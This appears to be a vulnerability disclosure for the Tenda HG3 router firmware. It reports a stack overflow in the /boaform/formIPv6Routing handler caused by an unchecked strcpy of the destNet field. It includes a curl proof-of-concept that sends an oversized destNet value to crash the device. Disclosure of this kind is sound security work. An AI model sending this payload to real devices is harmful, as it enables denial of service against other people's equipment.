Vendor of the products:    Tenda

Vendor’s website:   https://www.tendacn.com/

Reported by:    Zhuang Haoran (1851805232@163.com)

Affected models and versions :

Tenda HG3 (HARD_VERSION=V2.0 , Version: 300003070)

Firmware download address:

https://www.tendacn.com/material/show/787197496692805

Overview

An stack overflow exists in Tenda-HG3 IoT devices . This vulnerability is caused by no No check parameters errors, leading to stack overflow. Attackers can exploit this vulnerability to access internal interfaces, thereby cause dos on IoT.

Vulnerability details

When the URL is, /boaform/formIPv6Routing , call function pointers according to the formUploadConfig

59e18b8ea7bf95678ccfbb75b38088ed.png

Without any length check , the strcpy be called

20cd4377581b1af4d7e533391339c167.png

when we make the destNet with lots of “a”, then the payload will Overwrite return address

Poc

curl -i '<http://127.0.0.1:8088/boaform/formIPv6Routing>' \\ 
     -H 'Content-Type: application/x-www-form-urlencoded' \\    
     --data 'destNet=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&metric=ff:ff'

Attack Demo